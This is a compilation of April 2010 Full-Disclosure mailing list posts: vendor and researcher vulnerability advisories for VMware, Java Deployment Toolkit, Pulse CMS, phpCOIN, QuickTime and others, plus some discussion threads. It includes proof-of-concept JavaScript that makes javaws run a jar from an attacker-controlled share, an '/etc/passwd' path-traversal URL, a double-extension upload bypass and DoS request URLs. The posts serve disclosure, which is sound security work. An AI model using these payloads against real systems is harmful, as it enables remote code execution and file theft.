[Full-disclosure] VMSA-2010-0007 VMware hosted products, vCenter Server and ESX patches resolve multiple security issues
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - VMware Security Advisory Advisory ID: VMSA-2010-0007 Synopsis: VMware hosted products, vCenter Server and ESX patches resolve multiple security issues Issue date:2010-04-09 Updated on:2010-04-09 (initial release of advisory) CVE numbers: CVE-2010-1142 CVE-2010-1140 CVE-2009-2042 CVE-2009-1564 CVE-2009-1565 CVE-2009-3732 CVE-2009-3707 CVE-2010-1138 CVE-2010-1139 CVE-2010-1141 - - 1. Summary VMware hosted products, vCenter Server and ESX patches resolve multiple security issues. 2. Relevant releases VMware Workstation 7.0, VMware Workstation 6.5.3 and earlier, VMware Player 3.0, VMware Player 2.5.3 and earlier, VMware ACE 2.6, VMware ACE 2.5.3 and earlier, VMware Server 2.0.2 and earlier, VMware Fusion 3.0, VMware Fusion 2.0.6 and earlier, VMware VIX API for Windows 1.6.x, VMware ESXi 4.0 before patch ESXi400-201002402-BG VMware ESXi 3.5 before patch ESXe350-200912401-T-BG VMware ESX 4.0 without patches ESX400-201002401-BG, ESX400-200911223-UG VMware ESX 3.5 without patch ESX350-200912401-BG VMware ESX 3.0.3 without patch ESX303-201002203-UG VMware ESX 2.5.5 without Upgrade Patch 15. Notes: Effective May 2010, VMware's patch and update release program during Extended Support will be continued with the condition that all subsequent patch and update releases will be based on the latest baseline release version as of May 2010 (i.e. ESX 3.0.3 Update 1, ESX 3.5 Update 5, and VirtualCenter 2.5 Update 6). Refer to section "End of Product Availability FAQs" at http://www.vmware.com/support/policies/lifecycle/vi/faq.html for details. Extended support for ESX 2.5.5 ends on 2010-06-15. Users should plan to upgrade to at least ESX 3.0.3 and preferably to the newest release available. Extended support for ESX 3.0.3 ends on 2011-12-10. Users should plan to upgrade to at least ESX 3.5 and preferably to the newest release available. End of General Support for VMware Workstation 6.x is 2011-04-27, users should plan to upgrade to the newest release available. End of General Support for VMware Server 2.0 is 2011-06-30, users should plan to upgrade to the newest release of either ESXi or VMware Player. Extended support for Virtual Center 2.0.2 is 2011-12-10, users should plan to upgrade to the newest release of vCenter Server. 3. Problem Description a. Windows-based VMware Tools Unsafe Library Loading vulnerability A vulnerability in the way VMware libraries are referenced allows for arbitrary code execution in the context of the logged on user. This vulnerability is present only on Windows Guest Operating Systems. In order for an attacker to exploit the vulnerability, the attacker would need to lure the user that is logged on a Windows Guest Operating System to click on the attacker's file on a network share. This file could be in any file format. The attacker will need to have the ability to host their malicious files on a network share. VMware would like to thank Jure Skofic and Mitja Kolsek of ACROS Security (http://www.acrossecurity.com) for reporting this issue to us. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2010-1141 to this issue. Steps needed to remediate this vulnerability: Guest systems on VMware Workstation, Player, ACE, Server, Fusion - Install the remediated version of Workstation, Player, ACE, Server and Fusion. - Upgrade tools in the virtual machine (virtual machine users will be prompted to upgrade). Guest systems on ESX 4.0, 3.5, 3.0.3, 2.5.5, ESXi 4.0, 3.5 - Install the relevant patches (see below for patch identifiers) - Manually upgrade tools in the virtual machine (virtual machine users will not be prompted to upgrade). Note the VI Client will not show the VMware tools is out of date in the summary tab. Please see http://tinyurl.com/27mpjo page 80 for details. The following table lists what action remediates the vulnerability (column 4) if a solution is available. See above for remediation details. VMware Product Running Replace with/ ProductVersion on Apply Patch = === = VirtualCenter any Windows not affected Workstation7.x any not affected Workstation6.5.x any 6.5.4 build 246459 or later Player 3.x any not affected Player 2.5.x any 2.5.4 buil
[Full-disclosure] Java Deployment Toolkit Performs Insufficient Validation of Parameters
Java Deployment Toolkit Performs Insufficient Validation of Parameters - Java Web Start (henceforth, jws) provides java developers with a way to let users launch and install their applications using a URL to a Java Networking Launching Protocol (.jnlp) file (essentially some xml describing the program). Since Java 6 Update 10, Sun has distributed an NPAPI plugin and ActiveX control called "Java Deployment Toolkit" to provide developers with a simpler method of distributing their applications to end users. This toolkit is installed by default with the JRE and marked safe for scripting. The launch() method provided by the toolkit object accepts a URL string, which it passes to the registered handler for JNLP files, which by default is the javaws utility. $ cmd /c ver Microsoft Windows XP [Version 5.1.2600] $ java -version java version "1.6.0_19" Java(TM) SE Runtime Environment (build 1.6.0_19-b04) Java HotSpot(TM) Client VM (build 16.2-b04, mixed mode, sharing) $ cat /proc/registry/HKEY_LOCAL_MACHINE/SOFTWARE/Classes/JNLPFile/Shell/Open/Command/\@ "C:\Program Files\Java\jre6\bin\javaws.exe" "%1" The toolkit provides only minimal validation of the URL parameter, allowing us to pass arbitrary parameters to the javaws utility, which provides enough functionality via command line arguments to allow this error to be exploited. The simplicity with which this error can be discovered has convinced me that releasing this document is in the best interest of everyone except the vendor. Affected Software All versions since Java SE 6 update 10 for Microsoft Windows are believed to be affected by this vulnerability. Disabling the java plugin is not sufficient to prevent exploitation, as the toolkit is installed independently. http://java.sun.com/javase/6/docs/technotes/guides/jweb/deployment_advice.html I believe non-Windows installations are unaffected. Consequences --- Exploitation of this issue is not terribly exciting, but is potentially of high enough impact to merit explanation. The javaws application supports the following command line parameters. $ javaws -help Usage: javaws [run-options] javaws [control-options] where run-options include: -verbose display additional output -offline run the application in offline mode -system run the application from the system cache only -Xnosplashrun without showing a splash screen -Jsupply option to the vm -wait start java process and wait for its exit control-options include: -viewer show the cache viewer in the java control panel -uninstallremove all applications from the cache -uninstall remove the application from the cache -import [import-options] import the application to the cache import-options include: -silent import silently (with no user interface) -system import application into the system cache -codebaseretrieve resources from the given codebase -shortcut install shortcuts as if user allowed prompt -association install associations as if user allowed prompt Perhaps the most interesting of these is -J, and the obvious attack is simply to add -jar followed by an attacker controlled UNC path to the jvm command line, which I've demonstrated below. Other attacks are clearly possible, but this is sufficient to demonstrate the problem. In order to trigger this attack in Internet Explorer, an attacker would use a code sequence like this /* ... */ var o = document.createElement("OBJECT"); o.classid = "clsid:CAFEEFAC-DEC7---ABCDEFFEDCBA"; o.launch("http: -J-jar -Jattacker.controlled\\exploit.jar none"); /* ... */ Or, for Mozilla Firefox /* ... */ var o = document.createElement("OBJECT"); o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit" document.body.appendChild(o); o.launch("http: -J-jar -Jattacker.controlled\\exploit.jar none"); /* ... */ Please note, at some point the registered MIME type was changed to application/java-deployment-toolkit, please verify which type applies to your users when verifying any mitigation implemented has been effective (the simplest way would be to look at the output of about:plugins on a reference machine). A harmless demonstration is provided at the URL below. http://lock.cmpxchg8b.com/bb5eafbc6c6e67e11c4afc88b4e1dd22/testcase.html --- Mitigation --- If you believe your users may be affected, you should consider applying one of the workarounds described below as a matter of urgency. - Internet Explorer users can be protected by temporarily setting the killbit on CAFEEFAC-DEC7-
Re: [Full-disclosure] Java Deployment Toolkit Performs InsufficientValidation of Parameters
jws seems to be one of those gifts that keeps on giving. I don't have actual numbers, but it seems to me I see it mentioned regularly in their vulnerability reports. -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Tavis Ormandy Sent: Friday, April 09, 2010 7:08 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Java Deployment Toolkit Performs InsufficientValidation of Parameters Java Deployment Toolkit Performs Insufficient Validation of Parameters - Java Web Start (henceforth, jws) provides java developers with a way to let users launch and install their applications using a URL to a Java Networking Launching Protocol (.jnlp) file (essentially some xml describing the program). Since Java 6 Update 10, Sun has distributed an NPAPI plugin and ActiveX control called "Java Deployment Toolkit" to provide developers with a simpler method of distributing their applications to end users. This toolkit is installed by default with the JRE and marked safe for scripting. The launch() method provided by the toolkit object accepts a URL string, which it passes to the registered handler for JNLP files, which by default is the javaws utility. $ cmd /c ver Microsoft Windows XP [Version 5.1.2600] $ java -version java version "1.6.0_19" Java(TM) SE Runtime Environment (build 1.6.0_19-b04) Java HotSpot(TM) Client VM (build 16.2-b04, mixed mode, sharing) $ cat /proc/registry/HKEY_LOCAL_MACHINE/SOFTWARE/Classes/JNLPFile/Shell/Open/C ommand/\@ "C:\Program Files\Java\jre6\bin\javaws.exe" "%1" The toolkit provides only minimal validation of the URL parameter, allowing us to pass arbitrary parameters to the javaws utility, which provides enough functionality via command line arguments to allow this error to be exploited. The simplicity with which this error can be discovered has convinced me that releasing this document is in the best interest of everyone except the vendor. Affected Software All versions since Java SE 6 update 10 for Microsoft Windows are believed to be affected by this vulnerability. Disabling the java plugin is not sufficient to prevent exploitation, as the toolkit is installed independently. http://java.sun.com/javase/6/docs/technotes/guides/jweb/deployment_advic e.html I believe non-Windows installations are unaffected. Consequences --- Exploitation of this issue is not terribly exciting, but is potentially of high enough impact to merit explanation. The javaws application supports the following command line parameters. $ javaws -help Usage: javaws [run-options] javaws [control-options] where run-options include: -verbose display additional output -offline run the application in offline mode -system run the application from the system cache only -Xnosplashrun without showing a splash screen -Jsupply option to the vm -wait start java process and wait for its exit control-options include: -viewer show the cache viewer in the java control panel -uninstallremove all applications from the cache -uninstall remove the application from the cache -import [import-options] import the application to the cache import-options include: -silent import silently (with no user interface) -system import application into the system cache -codebaseretrieve resources from the given codebase -shortcut install shortcuts as if user allowed prompt -association install associations as if user allowed prompt Perhaps the most interesting of these is -J, and the obvious attack is simply to add -jar followed by an attacker controlled UNC path to the jvm command line, which I've demonstrated below. Other attacks are clearly possible, but this is sufficient to demonstrate the problem. In order to trigger this attack in Internet Explorer, an attacker would use a code sequence like this /* ... */ var o = document.createElement("OBJECT"); o.classid = "clsid:CAFEEFAC-DEC7---ABCDEFFEDCBA"; o.launch("http: -J-jar -Jattacker.controlled\\exploit.jar none"); /* ... */ Or, for Mozilla Firefox /* ... */ var o = document.createElement("OBJECT"); o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit" document.body.appendChild(o); o.launch("http: -J-jar -Jattacker.controlled\\exploit.jar none"); /* ... */ Please note, at some point the registered MIME type was changed to application/java-deployment-toolkit, please verify which type applies to your users when verifying any mitigation implemented has been effective (the simplest wa
[Full-disclosure] Secunia Research: Pulse CMS Arbitrary File Upload Vulnerability
== Secunia Research 08/04/2010 - Pulse CMS Arbitrary File Upload Vulnerability - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Pulse CMS basic version 1.2.2 and 1.2.3 NOTE: Other versions may also be affected. == 2) Severity Rating: Moderately critical Impact: System access Where: From remote == 3) Vendor's Description of Software "Pulse is a simple CMS designed for small websites. It enables you to take an existing site and add content management in five minutes.". Product Link: http://pulsecms.com/ == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Pulse CMS, which can be exploited by malicious users to compromise a vulnerable system. An error in the validation of uploaded image files can be exploited to upload files with an arbitrary extension to a folder within the web root. This can be exploited to upload and execute arbitrary PHP code. Successful exploitation requires authentication. == 5) Solution Partially fixed in version 1.2.4. It can still be exploited to execute arbitrary PHP code by uploading a malicious PHP script with multiple extensions (e.g. "shell.php.gif") if Apache is not configured to handle the mime-type for media files with an e.g. "gif" extension. == 6) Time Table 19/03/2010 - Vendor notified. 19/03/2010 - Vendor response. 08/04/2010 - Public disclosure. == 7) Credits Discovered by Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-0993 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2010-47/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ == ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: Pulse CMS Cross-Site Request Forgery
== Secunia Research 08/04/2010 - Pulse CMS Cross-Site Request Forgery - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Pulse CMS basic version 1.2.2 and 1.2.3 NOTE: Other versions may also be affected. == 2) Severity Rating: Less critical Impact: Cross-site scripting Where: From remote == 3) Vendor's Description of Software "Pulse is a simple CMS designed for small websites. It enables you to take an existing site and add content management in five minutes." Product Link: http://pulsecms.com/ == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Pulse CMS, which can be exploited by malicious people to conduct cross-site scripting attacks. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to e.g. upload or delete image files and create blocks if a logged-in user visits a malicious web site. == 5) Solution Update to version 1.2.4. == 6) Time Table 19/03/2010 - Vendor notified. 19/03/2010 - Vendor response. 08/04/2010 - Public disclosure. == 7) Credits Discovered by Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-0992 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2010-46/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ == ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] List Charter
[Full-Disclosure] Mailing List Charter John Cartwright - Introduction & Purpose - This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright. The Full-Disclosure list is hosted and sponsored by Secunia. - Subscription Information - Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure. Alternatively, commands may be emailed to full-disclosure-requ...@lists.grok.org.uk, send the word 'help' in either the message subject or body for details. - Moderation & Management - The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance. It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management. An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/. - Acceptable Content - Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list. - Posting Guidelines - The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list. Quoting should not exceed that which is necessary to convey context, this is especially relevant to members subscribed to the digested version of the list. The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible. Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient. Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected. Members may post to the list by emailing full-disclos...@lists.grok.org.uk. Do not send subscription/ unsubscription mails to this address, use the -request address mentioned above. - Charter Additions/Changes - The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management. Alterations will be made after consultation with list members and a concensus has been reached. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in phpCOIN
Hello Full-Disclosure! I want to warn you about security vulnerabilities in system phpCOIN. - Advisory: Vulnerabilities in phpCOIN - URL: http://websecurity.com.ua/4090/ - Affected products: phpCOIN 1.6.5 and previous versions. - Timeline: 17.03.2010 - found vulnerabilities. 01.04.2010 - disclosed at my site. 02.04.2010 - informed developers. - Details: These are Insufficient Anti-automation and Denial of Service vulnerabilities. The vulnerabilities exist in captcha script CaptchaSecurityImages.php, which is using in this system. I already reported about vulnerabilities in CaptchaSecurityImages (http://websecurity.com.ua/4043/). Insufficient Anti-automation: http://site/coin_addons/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2 Captcha bypass is possible via half-automated or automated (with using of OCR) methods, which were mentioned before (http://websecurity.com.ua/4043/). DoS: http://site/coin_addons/captcha/CaptchaSecurityImages.php?width=1000&height=9000 With setting of large values of width and height it's possible to create large load at the server. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in phpCOIN
2010/4/9 MustLive : > Hello Full-Disclosure! > Quoting the list charter: "Gratuitous advertisement, product placement, or self-promotion is forbidden." And where's the point in reporting several projects that use a -say- library which has a reported problem? (I mean, you've send quite the same mail with a different software to bugtraq, today.) The whole point of your "advisories" is self promotion and promotion of your website. > I want to warn you about security vulnerabilities in system phpCOIN. > > - > Advisory: Vulnerabilities in phpCOIN > - > URL: http://websecurity.com.ua/4090/ > - > Affected products: phpCOIN 1.6.5 and previous versions. > - > Timeline: > 17.03.2010 - found vulnerabilities. > 01.04.2010 - disclosed at my site. > 02.04.2010 - informed developers. > - > Details: > > These are Insufficient Anti-automation and Denial of Service > vulnerabilities. > > The vulnerabilities exist in captcha script CaptchaSecurityImages.php, which > is using in this system. I already reported about vulnerabilities in > CaptchaSecurityImages (http://websecurity.com.ua/4043/). > > Insufficient Anti-automation: > > http://site/coin_addons/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2 > > Captcha bypass is possible via half-automated or automated (with using of > OCR) methods, which were mentioned before (http://websecurity.com.ua/4043/). > > DoS: > > http://site/coin_addons/captcha/CaptchaSecurityImages.php?width=1000&height=9000 > > With setting of large values of width and height it's possible to create > large load at the server. > > Best wishes & regards, > MustLive > Administrator of Websecurity web site > http://websecurity.com.ua > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in phpCOIN
On Fri, 09 Apr 2010 15:49:58 +0200, "Jan G.B." said: > And where's the point in reporting several projects that use a -say- > library which has a reported problem? (I mean, you've send quite the > same mail with a different software to bugtraq, today.) A few years ago, a rather nasty vulnerability was found in the zlib compression library. We then saw a whole raft of advisories for things that included the zlib libraries, because often the package shipped with a private copy of zlib so patching the system zlib did *not* actually fix the problem for the zlib-using package. And quite frankly, if it's a very low-level package, the average system admin may not even *realize* that his very important MobyFoo package that he remembers uses something called FooBar (or at least he remembers MobyFoo wanting FooBar when he installed it 3 years ago), and the year after that, FooBar started using QuuxBaz, which (a) the sysadmin didn't even know was installed on his box, and (b) has a security hole. You think I'm kidding? Even *after* some vigorous pruning, my Fedora laptop has 1,782 RPMs installed - back around Red Hat 9 it was more like 600. Lotta software bloat going on, and most sysadmins don't have the combo of time and clue to fight it. For instance, it's a losing battle to keep Bluetooth software off this laptop, even though it doesn't *have* Bluetooth hardware, because more and more packages link in Bluetooth "in case you have it". And not one of those package developers understands the concept of a linker "weak reference". Argh. pgp8WiG3vUCOH.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in phpCOIN
2010/4/9 : > On Fri, 09 Apr 2010 15:49:58 +0200, "Jan G.B." said: > >> And where's the point in reporting several projects that use a -say- >> library which has a reported problem? (I mean, you've send quite the >> same mail with a different software to bugtraq, today.) > > A few years ago, a rather nasty vulnerability was found in the zlib > compression library. We then saw a whole raft of advisories for things > that included the zlib libraries, because often the package shipped with > a private copy of zlib so patching the system zlib did *not* actually > fix the problem for the zlib-using package. > > And quite frankly, if it's a very low-level package, the average system > admin may not even *realize* that his very important MobyFoo package that > he remembers uses something called FooBar (or at least he remembers MobyFoo > wanting FooBar when he installed it 3 years ago), and the year after that, > FooBar started using QuuxBaz, which (a) the sysadmin didn't even know was > installed on his box, and (b) has a security hole. > > You think I'm kidding? Even *after* some vigorous pruning, my Fedora laptop > has 1,782 RPMs installed - back around Red Hat 9 it was more like 600. Lotta > software bloat going on, and most sysadmins don't have the combo of time and > clue to fight it. For instance, it's a losing battle to keep Bluetooth > software off this laptop, even though it doesn't *have* Bluetooth hardware, > because more and more packages link in Bluetooth "in case you have it". > > And not one of those package developers understands the concept of a linker > "weak reference". Argh. > You're right. But the target of these advisories seems to be to get as many visitors as possible to that site and not to inform the developers (see dates). Regards ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] LFI In Multi Profit Websites
Local File Inclusion (LFI) in Multi Profit Websites Multi Profit Websites is a commercial script that is running on multiple domains and they claims that this script earns money for the owner. Vulnerability Local File Inclusion Via URL which can be reproduced by domain/page.php?id=../../../../../../etc/passwd Reported : 1st april 2009 Fixed : -- Credits, H4CK3R Crew ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in phpCOIN
I think Universities should rethink their Software Development courses... Valdis has got a very strong point. Here's my own. I got Safari to test websites I develop. Apple seems to think that during a recommended/critical Safari update, I should be installing iTunes. Oh, and surprise, with iTunes you get a couple of Apple Sync'ing services, not to mention some hidden server. It isn't *just* Apple, it's Linux, Microsoft and just about any other company. Microsoft forces you to get Desktop search (and turn on the indexing service, which has its own set of exploits and slows the computer down *a lot*). Regards, Chris. On Fri, Apr 9, 2010 at 4:12 PM, wrote: > On Fri, 09 Apr 2010 15:49:58 +0200, "Jan G.B." said: > > > And where's the point in reporting several projects that use a -say- > > library which has a reported problem? (I mean, you've send quite the > > same mail with a different software to bugtraq, today.) > > A few years ago, a rather nasty vulnerability was found in the zlib > compression library. We then saw a whole raft of advisories for things > that included the zlib libraries, because often the package shipped with > a private copy of zlib so patching the system zlib did *not* actually > fix the problem for the zlib-using package. > > And quite frankly, if it's a very low-level package, the average system > admin may not even *realize* that his very important MobyFoo package that > he remembers uses something called FooBar (or at least he remembers MobyFoo > wanting FooBar when he installed it 3 years ago), and the year after that, > FooBar started using QuuxBaz, which (a) the sysadmin didn't even know was > installed on his box, and (b) has a security hole. > > You think I'm kidding? Even *after* some vigorous pruning, my Fedora > laptop > has 1,782 RPMs installed - back around Red Hat 9 it was more like 600. > Lotta > software bloat going on, and most sysadmins don't have the combo of time > and > clue to fight it. For instance, it's a losing battle to keep Bluetooth > software off this laptop, even though it doesn't *have* Bluetooth hardware, > because more and more packages link in Bluetooth "in case you have it". > > And not one of those package developers understands the concept of a linker > "weak reference". Argh. > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in phpCOIN
Amen to that. Everything seems to be delivered for installation and even increasingly with *each* update, carrying various "hitch hiker" applications... toolbars, trial software, etc. Sun Java updates installing toolbars, Adobe doing toolbars, even FoxIT installed some toolbars (even after I said no) with the last update. If not a toolbar, then a $...@#%$# "download manager". Adobe has one that insists on being installed (which had it's own set of exploits already). Even Cisco's support site wants to install a 47-click java applet to get an IOS update these days. I'd like to set the wayback machine for the non-web-2.0, straightforward command line days :-) Jeff -Original Message- From: Christian Sciberras I think Universities should rethink their Software Development courses... Valdis has got a very strong point. Here's my own. I got Safari to test websites I develop. Apple seems to think that during a recommended/critical Safari update, I should be installing iTunes. Oh, and surprise, with iTunes you get a couple of Apple Sync'ing services, not to mention some hidden server. It isn't *just* Apple, it's Linux, Microsoft and just about any other company. Microsoft forces you to get Desktop search (and turn on the indexing service, which has its own set of exploits and slows the computer down *a lot*). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-068: Apple QuickTime H.263 Array Index Parsing Remote Code Execution Vulnerability
ZDI-10-068: Apple QuickTime H.263 Array Index Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-068 April 9, 2010 -- CVE ID: CVE-2010-0062 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9681. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required in that a target must open a malicious media file or visit a malicious page. The specific flaw exists within the parsing of H.263 media files. The code within QuickTime trusts various values from MDAT structures and uses them during operations on heap memory. By crafting specific values the corruption can be leveraged to execute remote code under the context of the user running the application. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT4104 -- Disclosure Timeline: 2010-04-06 - Vulnerability reported to vendor 2010-04-09 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in TAK cms
lol. On Thu, Apr 8, 2010 at 4:30 PM, Benji wrote: > nah, he'd be telling us how that was an easy way to find valid accounts. > > -Benji > > On Thu, Apr 8, 2010 at 6:30 PM, T Biehn wrote: >> >> If there were an account lockout after 5 tries would you be telling us >> about how there was a DOS vector on the same software? >> >> -Travis >> >> On Mon, Apr 5, 2010 at 4:35 PM, MustLive >> wrote: >> > Hello Full-Disclosure! >> > >> > I want to warn you about security vulnerabilities in TAK cms. It's >> > Ukrainian >> > commercial CMS. >> > >> > - >> > Advisory: Vulnerabilities in TAK cms >> > - >> > URL: http://websecurity.com.ua/4050/ >> > - >> > Timeline: >> > 04.02.2009 - found vulnerabilities. >> > 30.09.2009 - informed owners of web sites where I found these >> > vulnerabilities. Taking into account, that I didn't find any contact >> > data of >> > developer of TAK cms, then I hope, that owners of that site informed him >> > about these vulnerabilities. This is one of those cases with commercial >> > CMS, >> > where developers didn't leave any contact data and there is no >> > information >> > about them in Internet. >> > 19.03.2010 - disclosed at my site. >> > - >> > Details: >> > >> > These are Insufficient Anti-automation and Brute Force vulnerabilities. >> > >> > Insufficient Anti-automation: >> > >> > http://site/about/contacts/ >> > http://site/register/getpassword/ >> > >> > At these pages there is not protection from automated requests >> > (captcha). >> > >> > Brute Force: >> > >> > http://site/auth/ >> > http://site/admin/ >> > >> > In login forms there is no protection from Brute Force attacks. >> > >> > Vulnerable are all versions of TAK cms. >> > >> > Best wishes & regards, >> > MustLive >> > Administrator of Websecurity web site >> > http://websecurity.com.ua >> > >> > ___ >> > Full-Disclosure - We believe in it. >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> > Hosted and sponsored by Secunia - http://secunia.com/ >> > >> >> >> >> -- >> FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C >> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on >> http://pastebin.com/f6fd606da >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: 